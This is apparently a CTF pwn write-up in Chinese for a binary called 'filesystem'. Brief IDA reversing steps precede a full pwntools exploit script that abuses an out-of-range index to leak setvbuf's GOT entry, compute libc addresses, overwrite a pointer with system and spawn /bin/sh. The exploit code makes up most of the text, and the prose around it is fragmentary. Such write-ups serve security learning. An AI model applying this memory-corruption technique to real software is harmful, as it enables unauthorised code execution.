filesystem是一個ELF64檔案。
用IDA64打開并F5反編譯:
先檢視Create下的函數(重命名位create()):
輕按兩下打開:
把0x10uLL切換成10進制:
0x6029E0 - 0x6020E0 = 0x900 from pwn import *
from LibcSearcher import *
sh = process('./filesystem')
def Create(filename):
sh.sendafter('> ', 'Create')
sh.sendafter('Filename: ', filename)
def Edit(index, content):
sh.sendafter('> ', 'Edit')
sh.sendafter('Index:', str(index))
sh.sendafter('Content:', content)
def Read(index):
sh.sendafter('> ', 'Read')
sh.sendafter('Index:', str(index))
def Checksec(index):
sh.sendafter('> ', 'Checksec')
sh.sendafter('Index:', str(index))
setvbuf_libc = 0x6fe80
system_libc = 0x453a0
# 填充16個a
for i in range(0x10):
Create('a')
#gdb.attach(sh)
# +1
Create(p64(0xfffffffffffffffe))
Read(0x1c71c71c71c71c6)
sh.recvuntil('Content: ')
setvbuf_got = u64(sh.recv(6).ljust(8, '\x00'))
log.success('setvbuf addr = %x' % setvbuf_got)
libc_base = setvbuf_got - setvbuf_libc
system_addr = libc_base + system_libc
Edit(0x1c71c71c71c71c6, p64(0xdeadbeef) + p64(system_addr))
sh.sendafter('>', 'Edit')
sh.sendafter('Index:', '/bin/sh')
sh.interactive()